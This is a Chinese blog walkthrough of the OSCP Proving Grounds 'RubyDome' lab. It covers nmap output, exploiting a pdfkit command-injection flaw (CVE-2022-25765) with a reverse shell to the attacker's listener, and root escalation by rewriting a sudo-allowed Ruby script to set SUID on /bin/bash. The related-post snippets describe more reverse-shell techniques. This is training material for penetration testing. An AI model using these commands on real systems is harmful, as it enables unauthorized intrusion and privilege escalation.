OSCP - Proving Grounds - RubyDome

最新推荐文章于 2024-10-20 09:50:36 发布
最新推荐文章于 2024-10-20 09:50:36 发布
阅读量203 收藏 4
点赞数 2
分类专栏: OSCP 文章标签: 网络安全 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/N61320/article/details/142432656
版权

主要知识点

  • 观察错误信息,找出关键点
  • 观察用户权限

具体步骤

执行nmap扫描,发现3000端口开放了http服务

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-09 14:43 UTC
Nmap scan report for #remote_ip#
Host is up (0.0010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
3000/tcp open  http    WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07))
|_http-title: RubyDome HTML to PDF
|_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=7/9%OT=22%CT=1%CU=33027%PV=Y%DS=2%DC=T%G=Y%TM=668D4
OS:CBA%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=109%TI=Z%II=I%TS=A)OPS(O1
OS:=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW
OS:7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=
OS:Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%R
OS:D=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q
OS:=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=
OS:G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 993/tcp)
HOP RTT     ADDRESS
1   0.66 ms pg-bafw54.offseclabs.com (192.168.50.254)
2   1.25 ms 192.168.54.22

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.70 seconds

 

打开后,发现如下,看起来是个Ruby的HTML转PDF的页面,参数是url,输入http://google.com的话,会得到一张PDF

23b67724cf0f49089bb4213781595bb9.png

4d3d85eb6168474588c536280937d65a.png

如果输入http://www.baidu.com的话,则会报错,从错误页面中发现wkhtmltopdf和pdfkit.rb信息.

 

8f9ea993aa1c4100905741613a7cebb5.png

 

google pdfkit exploit 发现有CVE-2022-25765漏洞可以利用

8fc5df122a884e33bd71552755df9dc7.png

下载后现在本地执行nc -nlvp 9000后再执行

python 51293.py -s #local_ip# 9000 -w http://#remote_ip#:3000/pdf -p url

fe48351872a344938d3ff345f970479c.png发现reverse shell已经建立,且可以执行 sudo /usr/bin/ruby /home/andrew/app/app.rb,并不需要密码验证

listening on [any] 9000 ...
connect to [#local_ip#] from (UNKNOWN) [#remote_ip#] 42544
id
uid=1001(andrew) gid=1001(andrew) groups=1001(andrew),27(sudo)
sudo -l
Matching Defaults entries for andrew on rubydome:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User andrew may run the following commands on rubydome:
    (ALL) NOPASSWD: /usr/bin/ruby /home/andrew/app/app.rb
pwd  
/home/andrew/app

修改/home/andrew/app/app.rb文件,赋予/bin/bash SUID权限

echo 'cmd = "chmod +s /bin/bash"
system( cmd )
' > app.rb
cat app.rb
cmd = "chmod +s /bin/bash"
system( cmd )

执行如下代码片段后,发现root权限已经获得

sudo /usr/bin/ruby /home/andrew/app/app.rb
ls -l /bin/bash
-rwsr-sr-x 1 root root 1396520 Jan  6  2022 /bin/bash
/bin/bash -p
id
uid=1001(andrew) gid=1001(andrew) euid=0(root) egid=0(root) groups=0(root),27(sudo),1001(andrew)

 

 

柴郡猫^O^
关注
专栏目录
OSCP - Proving Grounds - Extplorer
柴郡猫^O^
09-30 440
更改本地/usr/share/webshells/php/php-reverse-shell.php 中的ip和port为local server的ip和9000端口,并在http://#remote_ip#/filemanager/下创建shell.php文件,并粘贴/usr/share/webshells/php/php-reverse-shell.php内容。访问http://#remote_ip#/filemanager/shell.php,reverse shell创建成功。
OSCP - Proving Grounds - Flu
柴郡猫^O^
09-25 365
上传linpeas.sh和pspy64到remote server,在linpeas.sh结果中发现 /opt/log-backup.sh比较可疑,但没找到对应的cron job(可能是我不够仔细),上传pspy64并运行后 发现,root会定期运行/opt/log-backup.sh。修改/opt/log-backup.sh为,当其被执行时,赋予/bin/bash SUID权限,过一会儿后,获得root权限。搜索一下发现该版本有RCE漏洞,详情请参考。,对应的PoC也有很多,有的不太好用,
OSCP - Proving Grounds - Maria
柴郡猫^O^
09-27 1237
终于在其中发现了真的数据库用户名密码,下一步打算是破解mysql中的workdpress admin密码和wordpress的admin+file upload来构造reverse shell,但是事情好像没那么简单,获取的ID没有更新数据库的权限,无法通过更新密码来登录,john 破解也没有什么希望,看来需要继续探索其他方式.搜索一圈,可以在浏览器中访问如下link下载文件,可以尝试下载wp-config.php,尝试其中的db用户名密码配置,无效。上传theme并激活。
OSCP - Proving Grounds - Readys
柴郡猫^O^
09-18 997
在redis-cli中尝试对/var/www/html等路径进行set,save操作时,发现报错,需要寻找有其他有权限写入的路径,尝试继续利用LFI漏洞读取 更多的文件,发现 /etc/systemd/system/redis.service 中redis具备写权限的路径为/opt/redis-files/将/etc/passwd替换成 /var/www/html/wp-config.php ,/etc/shadow,/home/alice/.ssh/id_rsa等文件,全部失败,暂时放弃。
OSCP - Proving Grounds - Muddy
柴郡猫^O^
10-10 449
在Firefox上激活webdav扩展,可以直接上传文件,这里我们更改/usr/share/webshells/php/php-reverse-shell.php 并上传,在本地启动nc -nlvp 1234后访问。其本质是本地文件包含,经过调查 apache的配置文件地址 在 /etc/apache2/sites-available/000-default.config,发现webdav的密码位置。执行nmap扫描,发现很多端口都开了,不过有用的就是8888。本地使用john来爆破密码。
OSCP - Proving Grounds - Nappa
柴郡猫^O^
09-21 559
下载FTP服务器的文件到本地,发现是一个ruby on rails 构建的web应用,搜索一下google,发现已经N多年没有人维护,粗略看一下,没有有趣的地方,也尝试用Gemfile中的ruby和rails版本搜索相关漏洞,得到的结果没有太多可利用的价值。尝试登录后,点击server status 按钮后,来到 serverinfo页面,观察源码后,发现一个注释掉的表单,看input name,也许可以执行服务器命令来建立reverse shell,
OSCP - Proving Grounds - CVE-2023-33831
柴郡猫^O^
10-06 188
搜索一下FUXA的vulnerability,得到CVE-2023-33831,当然了,和靶机的标题一样,估计肯定是这个了,下载后现在本地执行nc -nlvp 80,再执行exp,得到root权限,好像很简单,并不会太难。nmap扫描,22/1881端口开放,而1881端口运行了FUXA。访问1881端口,发现FUXA v1.15版本正在运行,但是报错。
OSCP - Proving Grounds - Pebbles
柴郡猫^O^
10-07 570
尝试寻找suid或者具备suid capability的可执行文件,均失败,于是上传linpeas.sh,得到有趣的东西,linux版本为4.4.0-21-generic,应该有内核漏洞。打开burpsuite,利用proxy访问 zoneminder,访问使用如下参数访问 ../zm/index.php。在本地调用nc -nlvp 80后,再访问 shell5.php,reverse shell创建成功。执行nmap扫描,很多端口开放,挨个看一下三个http端口。
OSCP - Proving Grounds - BlackGate
最新发布
柴郡猫^O^
10-20 80
之后我上传了linpeas.sh和pspy64,但是linpeas.sh执行到半路不知为何卡住了,而pspy64也没有有用的线索,但是sudo -l发现了有趣的东西。直接执行sudo /usr/local/bin/redis-status,发现会要求一个Authorization Key,胡乱输入是不行的。使用刚得到的Authorization Key重新调用sudo /usr/local/bin/redis-status。中的描述得到reverse shell,也可以直接拿到第一个flag。
java红酒网站源码-OSCP-Survival:OSCP-生存
06-05
java网站源码OSCP-生存 这是一个克隆 这也可以查看 OSCP-生存指南 注意:本文档将目标 ip 称为导出变量 $ip。 要在命令行上设置此值,请使用以下语法: 出口ip=192.168.1.100 目录 卡利Linux 将目标 IP 地址设置为$...
java红酒网站源码-oscp-notes:oscp-notes
06-05
java网站源码OSCP - PWK(使用 Kali 进行渗透测试)注意事项 完成整个 OSCP 课程的完整 OSCP 笔记 目录 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH...
java红酒网站源码-OSCP-Notes:OSCP-笔记
06-05
java网站源码OSCP-笔记 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH环境变量中搜索目录which sbd 查找名称中包含特定字符串的文件的搜索: find / -...
javasnmp源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-04
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
java红酒网站源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-05
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8508
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
psycopg2-2.9.3-cp37-cp37m-win_amd64.whl
10-19
psycopg2-2.9.3-cp37-cp37m-win_amd64.whl
nitime-0.9-cp36-cp36m-win_amd64.whl
10-19
nitime-0.9-cp36-cp36m-win_amd64.whl
【BP时序预测】基于蜣螂优化算法DBO-BP实现负荷数据预测单输入单输出附matlab代码.rar
10-20
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值